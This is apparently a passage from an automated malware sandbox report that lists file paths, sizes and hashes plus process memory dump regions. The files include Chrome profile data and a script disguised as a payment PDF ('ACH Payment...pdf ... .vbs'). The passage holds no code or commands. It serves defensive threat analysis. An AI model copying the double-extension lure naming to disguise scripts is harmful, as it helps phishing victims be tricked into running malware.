                                                                              ac27b7c0a1a62b5d826b6e4593da3a2f9a6fc166

                                                                              SHA256

                                                                              5f7627b1f6864599bdf95efe86b12aa52272beaa937b434200c6e52efd96af22

                                                                              SHA512

                                                                              18f962fe05d7706670e9568d170bfe73c0ed31d15470b831bda58b1392aa2ebf2197fb856d3c453bca31fce7a1bc0433f3f9f1d7943aca395b2fe8a016334280

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                              Filesize

                                                                              7KB

                                                                              MD5

                                                                              54d4fccf8cae6843100bfa3dac86b880

                                                                              SHA1

                                                                              6ce5eb3e6bfcb9e783a189cee02dea93990bd71e

                                                                              SHA256

                                                                              e8a9361d2affe7cc18cb7daad2244b69dedbc3168964dc4645be953d990fb0e1

                                                                              SHA512

                                                                              098968b0383cbb44830e35374e28bb1131f69e878c52c2f8affd6d549f793054219f6e406155cc87118124ce35910942e788084daa54c5f0be2ee3174dc75abe

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                              Filesize

                                                                              6KB

                                                                              MD5

                                                                              390fa02de0297dc3df246d0ece4b6875

                                                                              SHA1

                                                                              478666212bddd1eb9a92e2fc823ce875946e6105

                                                                              SHA256

                                                                              9269e7a5d66ecddead08d748eae69a06006ea44af19eb28b7eae0d1fc1494345

                                                                              SHA512

                                                                              2fe86fb0f37dcac4a89b0a76ba8f0b7d52c9e69324f265d62fefd769649f1393a365fd965882eb30a60e4485f2b1887758c4c6bdbdbc7ce1de7d06d73d1eee93

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                              Filesize

                                                                              7KB

                                                                              MD5

                                                                              4a10f81216384962bf6d76f8cae8219c

                                                                              SHA1

                                                                              c65289b53e03c398a997ff7bfeb93087e22efdba

                                                                              SHA256

                                                                              b48d8400aa6041a8c2a355c02614ef766d44da90195f7e504d7cb6512cf9ec7d

                                                                              SHA512

                                                                              e305ee7d706b107ad4321174ec6f1df5a01151ff798c88b4b8f195763147f4d35a2a4303e02b99214916574775b59fe90cc0a844fcddc84d024b6116e8d7c34b

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                              Filesize

                                                                              6KB

                                                                              MD5

                                                                              86158e9c09a57df76931c543e7a3dd5d

                                                                              SHA1

                                                                              c67aa584402e25409dc53900ee50801f436be451

  SHA256   feb82e4cbca051f735eb640bfeb0aafd1c1723f04ff2ad966e52eb2b7605400f
  SHA512   68af53526b52020d19087357b40c1034a6924b163c382fe744a2b735d5cc8b4477c8da29cb780492925587b86d8a5e1601bd1f98700e6c047f49952a870618fd

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
  Filesize 72B
  MD5      caf717ded3be16d7c8bd079195eaeb3a
  SHA1     427e33f9bfb06f14037cd53e368fa34e577f3f0a
  SHA256   905a95de0eed6fb92a4d6975674cdb534d977a8172e8ad4a334f7f3f62142c3b
  SHA512   36edb690e6e1d08def64c44407bd335c2e507f6daaf44987df6cfbc31b2af9298739b5cddbfbb1b196543744a47793ebefe18f1ac134c4762c74ceb91395eb6d

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe58c119.TMP
  Filesize 48B
  MD5      bd6b7887af1864b871fd462af57d5054
  SHA1     ebc5f976d0b6ab7443de166c98232468ead1d2c0
  SHA256   cb1005036348abee089f2923f971dc47fd4383f246abc57a499ca8a67fda0325
  SHA512   40d0558a6aeee2a57d9ccc6949b6e9dd97a28f5b35815cd201937daf149fc53f3e9f01721e0c7f88b8bc4a4cb20a32c7e60699908c4b7fa765f4d1198e76783f

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
  Filesize 87KB
  MD5      02141755a998604786790fab03c8cabf
  SHA1     90ce107036aa034c7b4d3c025c384259edf2f00e
  SHA256   8d0f5b8c847f43b16a77917742c46e3f6530cb6892c2256f5178f9d61f8797d5
  SHA512   5f1e109148bd2509d948f55a114c4c298594e66039b9b89ed7c1d453e4fd7faa3cbaf780eaa43b44aabc4a0b5fbdc91346134c6f92e0c872c10300d43a8391bf

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
  Filesize 101KB
  MD5      9810fcd17a1f0aa4586eccac6ed4dd93
  SHA1     874ea341f152a88e454881226f20a09a783b10c1
  SHA256   de46ded57c4e4fabd6bcafd001e4fb03d4d719f2e73a9babc52e768d5757ae8d
  SHA512   4ffccd8f96e06cec83f7aa8bb3db66fbc0607f12a57f4aa7ea7ff4aefcdb7ff7d8f8271a7fe02859118c539a3367a5b388d593f8cfebe4a34da76c73cf03c304

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
  Filesize 107KB
  MD5      b4faff9db3434030ac33a187eac5d200
  SHA1     4076b1c238e120572dcb346194a7848838ab6e2f
  SHA256   0cd73c0a324643d680baf50d482b561b876243824cd2ec27d0cf67ee5367dc13
  SHA512   0a666cd2ed3e40dbf9be62ae7d87fe6aa709e2213bda7a3c88b281310efcbab50d089f4e91c9afc9c0a6324a652ec2a2b5f1116f3a886f551b60ae5ba6744d59

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe5881be.TMP
  Filesize 97KB
  MD5      6d87b43cf67b719c5a633e2377bb88c7
  SHA1     edd73d6db77309b5b2a9e0098309bb7f3e048f80
  SHA256   88fef41829ec3aa17ba62e41d2e2a64c54adf4712a5cc36f88a411c7fe96381e
  SHA512   14a6f7fba5e6e725308b777f86de51b080ce16c4603f93f69e7580f7a9471fd8119b250b423e7556f7fcb4870feb16c873d33cb6acf876f1c5d7da23e9c7ec91

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
  Filesize 2B
  MD5      99914b932bd37a50b983c5e7c90ae93b
  SHA1     bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
  SHA256   44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
  SHA512   27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

• C:\Users\Admin\AppData\Local\Temp\Error.pdf
  Filesize 56KB
  MD5      d7f8acc23447803e1066bf68c94df562
  SHA1     19abc068947bfbe92b259401c31cd622cc586334
  SHA256   ebedad982f57e95005c13bb5dd0331fe7417f977ae20ec531b7ca1bfe01e99a0
  SHA512   ff858a3d5068018b362742179650999639867e52d88abc05890ae11da3914e2414de8d9bfe25525b1418a30bd501b7587cffd3ff08fb3bac0bd2dacb6a6d4b39

• C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ul5cthvq.oix.ps1
  Filesize 60B
  MD5      d17fe0a3f47be24a6453e9ef58c94641
  SHA1     6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256   96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512   5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

• C:\Users\Admin\Downloads\ACH Payment_USD 3480.pdf address 2023-07-13 .vbs
  Filesize 2.4MB
  MD5      d86f23941cc6e4b33b758a8cd2e94dca
  SHA1     60f1673919ed51df2004a58e490be3dac5cecb39
  SHA256   26ee00d9c30b365f6448bcb84d4594e04a557157a78a5b6e4f8dbc4cfb31f7d3
  SHA512   68b3807316940a6f0535ed39ce3005a15274d54c780c3bbbf6f1547c7ef67fbd6dbf5607ad260ceff5f667809a838cf361c5a996aae69dc185bea47dbf755846

• memory/1940-472-0x00007FF831110000-0x00007FF831BD1000-memory.dmp  Filesize 10.8MB
• memory/1940-473-0x0000026CFB370000-0x0000026CFB380000-memory.dmp  Filesize 64KB
• memory/1940-474-0x0000026CFB370000-0x0000026CFB380000-memory.dmp  Filesize 64KB
• memory/1940-475-0x0000026CFB370000-0x0000026CFB380000-memory.dmp  Filesize 64KB
• memory/1940-467-0x0000026CFB3B0000-0x0000026CFB3D2000-memory.dmp  Filesize 136KB
• memory/1940-498-0x00007FF831110000-0x00007FF831BD1000-memory.dmp  Filesize 10.8MB
• memory/1940-504-0x0000026CFB370000-0x0000026CFB380000-memory.dmp  Filesize 64KB
• memory/1940-503-0x0000026CFB370000-0x0000026CFB380000-memory.dmp  Filesize 64KB
• memory/1940-502-0x0000026CFB370000-0x0000026CFB380000-memory.dmp  Filesize 64KB
• memory/2964-479-0x0000000004D70000-0x0000000004D80000-memory.dmp  Filesize 64KB
• memory/2964-528-0x0000000008270000-0x000000000979F000-memory.dmp  Filesize 21.2MB
• memory/2964-496-0x0000000007BF0000-0x000000000826A000-memory.dmp  Filesize 6.5MB
• memory/2964-497-0x00000000067E0000-0x00000000067FA000-memory.dmp  Filesize 104KB
• memory/2964-483-0x0000000005B50000-0x0000000005BB6000-memory.dmp  Filesize 408KB
• memory/2964-499-0x0000000007570000-0x0000000007606000-memory.dmp  Filesize 600KB
• memory/2964-500-0x00000000074C0000-0x00000000074E2000-memory.dmp  Filesize 136KB
• memory/2964-501-0x00000000097A0000-0x0000000009D44000-memory.dmp  Filesize 5.6MB
• memory/2964-482-0x0000000005330000-0x0000000005396000-memory.dmp  Filesize 408KB
• memory/2964-481-0x0000000005290000-0x00000000052B2000-memory.dmp  Filesize 136KB
• memory/2964-480-0x00000000053B0000-0x00000000059D8000-memory.dmp  Filesize 6.2MB
• memory/2964-505-0x0000000074CB0000-0x0000000075460000-memory.dmp  Filesize 7.7MB
• memory/2964-478-0x0000000004D70000-0x0000000004D80000-memory.dmp  Filesize 64KB
• memory/2964-524-0x0000000004D70000-0x0000000004D80000-memory.dmp  Filesize 64KB
• memory/2964-527-0x00000000068D0000-0x00000000068D1000-memory.dmp  Filesize 4KB
• memory/2964-493-0x0000000006280000-0x000000000629E000-memory.dmp  Filesize 120KB
• memory/2964-529-0x0000000008270000-0x000000000979F000-memory.dmp  Filesize 21.2MB
• memory/2964-536-0x00000000776D1000-0x00000000777F1000-memory.dmp  Filesize 1.1MB
• memory/2964-537-0x00000000776D1000-0x00000000777F1000-memory.dmp  Filesize 1.1MB
• memory/2964-562-0x0000000074CB0000-0x0000000075460000-memory.dmp  Filesize 7.7MB
• memory/2964-476-0x0000000074CB0000-0x0000000075460000-memory.dmp  Filesize 7.7MB
• memory/2964-477-0x0000000004C90000-0x0000000004CC6000-memory.dmp  Filesize 216KB
• memory/3636-541-0x00000000776D1000-0x00000000777F1000-memory.dmp  Filesize 1.1MB
• memory/3636-544-0x0000000001280000-0x00000000027AF000-memory.dmp  Filesize 21.2MB
• memory/3636-545-0x0000000000400000-0x000000000062B000-memory.dmp  Filesize 2.2MB
• memory/3636-540-0x0000000077758000-0x0000000077759000-memory.dmp  Filesize 4KB
• memory/3636-555-0x0000000000400000-0x000000000062B000-memory.dmp  Filesize 2.2MB
• memory/3636-559-0x0000000001280000-0x00000000027AF000-memory.dmp  Filesize 21.2MB
• memory/3636-539-0x0000000001280000-0x00000000027AF000-memory.dmp  Filesize 21.2MB
• memory/3636-538-0x0000000001280000-0x00000000027AF000-memory.dmp  Filesize 21.2MB